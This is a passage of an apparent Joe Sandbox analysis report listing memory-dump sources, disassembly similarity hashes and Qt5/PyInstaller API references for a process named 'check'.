                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?mapIdentityIndex@@ModelModel@@ProxySource@V2@@
                                                                                                                                                                                                                • String ID: BJ9$QIdentityProxyModel$mapToSource$mapToSource(self, proxyIndex: QModelIndex) -> QModelIndex
                                                                                                                                                                                                                • API String ID: 2343858911-3423889660
                                                                                                                                                                                                                • Opcode ID: ae81534e1e8be8d18e16133f392259621f6a81ad8d03584ba4f36c14fdf5edad
                                                                                                                                                                                                                • Instruction ID: 0ae26ca760e9c1c062a9f9fc0e4fef9bc71e2eaa14ea4820a4e941be09e843d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae81534e1e8be8d18e16133f392259621f6a81ad8d03584ba4f36c14fdf5edad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C314D62609B8685DB90CF25F8587AA7370FB89B80F499132DA8D13B65EF3CD548C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF60B12918F,?,00007FF60B123C55), ref: 00007FF60B122BA0
                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF60B122C2A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                • Instruction ID: 2dcc3c6263057e5440c7c58213eb94c5e124b731065e5966260dea364fe587a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB219C62B08B4192E7109B14F8847AA73A4EB8C788F508176EA8ED7669EF3CD615C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setSourceModel@QTransposeProxyModel@@UEAAXPEAVQAbstractItemModel@@@Z.QT5CORE ref: 00007FFB02F484A1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setAbstractItemModel@Model@@Model@@@ProxySourceTranspose
                                                                                                                                                                                                                • String ID: B@J8$QTransposeProxyModel$setSourceModel$setSourceModel(self, newSourceModel: Optional[QAbstractItemModel])
                                                                                                                                                                                                                • API String ID: 2779479292-1908483256
                                                                                                                                                                                                                • Opcode ID: c2d5fafc38e6d72cdfa3903c7f1cd1684fd663249097907f7c51c4630b320cd0
                                                                                                                                                                                                                • Instruction ID: 586abe2d1b9676afb8525d120b8656ef189e4b9ef33d5f4065362725236d82ab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d5fafc38e6d72cdfa3903c7f1cd1684fd663249097907f7c51c4630b320cd0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C311EB6609B8681EA508F65E8847AA77A4FB84BD0F585132DA8D53B74EFBCD048C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setSourceModel@QAbstractProxyModel@@UEAAXPEAVQAbstractItemModel@@@Z.QT5CORE ref: 00007FFB03010381
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Abstract$?setItemModel@Model@@Model@@@ProxySource
                                                                                                                                                                                                                • String ID: B@J8$QAbstractProxyModel$setSourceModel$setSourceModel(self, sourceModel: Optional[QAbstractItemModel])
                                                                                                                                                                                                                • API String ID: 3871122599-151464116
                                                                                                                                                                                                                • Opcode ID: a181252e52d2bcc70050ef1bca953218b5e8870bb2284b31118eea3b0c36b9e6
                                                                                                                                                                                                                • Instruction ID: b6f6a8b9f08b2d594504dc3baa262b4c649e67c374a283bc418f3bbef722d0b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a181252e52d2bcc70050ef1bca953218b5e8870bb2284b31118eea3b0c36b9e6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 713126B5609F8686EB509F25E4487AA73A4FB84B94F584132DA8D53B74EF7CD084C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?fileName@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFB02F2C47B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?fileComponentFlags@FormattingName@Option@String@@Url@@Url@@@@@malloc
                                                                                                                                                                                                                • String ID: B|J1$QUrl$fileName$fileName(self, options: Union[QUrl.ComponentFormattingOptions, QUrl.ComponentFormattingOption] = QUrl.FullyDecoded) -> str
                                                                                                                                                                                                                • API String ID: 985488206-4096926392
                                                                                                                                                                                                                • Opcode ID: 07685b4be0db4a22bb3478a462617e9c71a84fa09c4b6e0d0d3936c48950b58e
                                                                                                                                                                                                                • Instruction ID: 9a0ef23c4a5ca212d6a25e3ef4f8ee4e83fd6b50407294b26c1118978017f96d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07685b4be0db4a22bb3478a462617e9c71a84fa09c4b6e0d0d3936c48950b58e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B3116B6719B4685DB908F25E888BAD33A8FB48B80F954136CA9D53720EF39D558C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?url@QUrl@@QEBA?AVQString@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@@Z.QT5CORE ref: 00007FFB02F1C397
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FormattingUrl@@$?url@ComponentFlags@Option@Option@2@@@@String@@malloc
                                                                                                                                                                                                                • String ID: B|J1$QUrl$url$url(self, options: QUrl.FormattingOptions = QUrl.PrettyDecoded) -> str
                                                                                                                                                                                                                • API String ID: 2095917953-1147450086
                                                                                                                                                                                                                • Opcode ID: 4a59391e8c337efd990a75c98d1830a1eb332f1154ea889f85134e24b02a2221
                                                                                                                                                                                                                • Instruction ID: 77de0ad9a4db6c65ef48593c9f7c3e45e65a242ab3b7a0800fb6eb2be4799f33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a59391e8c337efd990a75c98d1830a1eb332f1154ea889f85134e24b02a2221
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 423134B6718B4685DB908F25E888BAD33A9FB4CB80F95413ACA9D53720EF39D558C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?userName@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFB02F203CB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?userComponentFlags@FormattingName@Option@String@@Url@@Url@@@@@malloc
                                                                                                                                                                                                                • String ID: B|J1$QUrl$userName$userName(self, options: Union[QUrl.ComponentFormattingOptions, QUrl.ComponentFormattingOption] = QUrl.FullyDecoded) -> str
                                                                                                                                                                                                                • API String ID: 2243265294-1489357731
                                                                                                                                                                                                                • Opcode ID: 3192801c778143cff99e20db8dd57c9907e74526f7910211eb2a1044d233da7d
                                                                                                                                                                                                                • Instruction ID: 5283f0f97758ad988096f58a79224ed8b92ba8d14710cd189ddaf8dd9c10fb6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3192801c778143cff99e20db8dd57c9907e74526f7910211eb2a1044d233da7d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F23136B6718B46C5DB909F25E888BAD33A8FB48B80F554136CA9D53720EF39D558C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FromLongLong_
                                                                                                                                                                                                                • String ID: B|J9$QAbstractItemModel$columnCount$columnCount(self, parent: QModelIndex = QModelIndex()) -> int
                                                                                                                                                                                                                • API String ID: 2938811853-1685434109
                                                                                                                                                                                                                • Opcode ID: 05baf75fb6110e312a30c85fbf49275a12db157822f7dee3fd1944a697e5c715
                                                                                                                                                                                                                • Instruction ID: 6ba3d574524592f6514f8f03ea139d2fe05a8a5aaa06fa90a1c443e9f0e0833d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05baf75fb6110e312a30c85fbf49275a12db157822f7dee3fd1944a697e5c715
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0231E9B2709B0681DB50DF25E8887A933A8FB487A0F560236DA6D57360EF39D599C344
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?timerEvent@Event@@@Line@@TimeTimer
                                                                                                                                                                                                                • String ID: BJ8$QTimeLine$timerEvent$timerEvent(self, event: Optional[QTimerEvent])
                                                                                                                                                                                                                • API String ID: 3644901892-680031716
                                                                                                                                                                                                                • Opcode ID: 1643a81d61c32015ec384075f6680d2b8904795de696f3da995102b85d2bef3e
                                                                                                                                                                                                                • Instruction ID: 0a5100e4f77324bf111d07e54bb79f6ee077aae3cb61e1ed0dded2e2648f5400
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1643a81d61c32015ec384075f6680d2b8904795de696f3da995102b85d2bef3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B213DB2A09B46C6EB408F35E444AAA77A4FB84B80F580136DA8D13738EF7CD458C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
